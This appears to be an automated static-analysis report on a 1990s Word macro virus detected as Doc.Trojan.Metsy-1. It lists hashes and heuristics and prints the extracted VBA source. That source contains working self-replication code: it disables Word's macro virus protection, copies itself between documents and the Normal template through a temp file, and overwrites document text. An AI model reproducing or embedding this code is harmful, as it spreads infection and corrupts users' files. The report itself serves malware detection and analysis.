Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ec41557a9840d86…

MALICIOUS

Office (OLE)

47.0 KB Created: 1999-10-20 14:01:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 042d549ead81dc35ed88a60029c37444 SHA-1: 00a144f35dc37dd447c3d604eb9e54917816e3fc SHA-256: 2ec41557a9840d86545556d0e2bc25f502e3fd353eef48ef8442ee1e12d22e8e
196 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits high-confidence indicators of maliciousness, including legacy WordBasic macro virus markers and the presence of VBA macros. The critical ClamAV detection as 'Doc.Trojan.Metsy-1' strongly suggests a known malware variant. The AutoClose and Document_Open macros indicate the malware attempts to execute code when the document is closed or opened, likely to achieve its malicious objectives.

Heuristics 6

  • ClamAV: Doc.Trojan.Metsy-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Metsy-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9382 bytes
SHA-256: 035a5acfa07e9d80318066b0f7c2d87c7b009d26a2903fe5cb72e48ac8d4b855
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
    For x = 1 To 4
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
Sub ToolsMacro()
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
Private Sub Document_Open()
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
     MsgBox "Happy Birthday Jess! To celebrate, we're going to see how lucky you are " & Application.UserName & ". Click the OK button below to roll a number. If your number matches that of the dealer, you win!"
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
     Y = Int((9 * Rnd) + 1)
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
               MsgBox "You roll a " & x & " and the dealer rolls a " & Y & ". You win!"
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
          Else
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
               For i = 1 To 14
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
                    x = x & RndNumber
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
                    ActiveDocument.Words.First = "YOU LOSE! "
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
                    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
          End If
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
Exit Sub
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc

Private Sub Document_Close()
On Error GoTo out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nt > 55 And ad > 0 Then GoTo out
If nt < 55 Then
     Set host = NormalTemplate.VBProject.VBComponents.Item(1)
     ActiveDocument.VBProject.VBComponents(1).Export "C:\System.dat"
     host.codemodule.AddFromFile ("C:\System.dat")
     With host.codemodule
     For x = 1 To 4
     .deletelines 1
     Next x
     End With
     Kill ("C:\System.dat")
End If
If ad = 0 Then
     Set host = ActiveDocument.VBProject.VBComponents.Item(1)
     NormalTemplate.VBProject.VBComponents(1).Export "C:\System.dat"
     host.codemodule.AddFromFile ("C:\System.dat")
     With host.codemodule
     For x = 1 To 4
     .deletelines 1
     Next x
     End With
     Kill ("C:\System.dat")
End If
out:
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.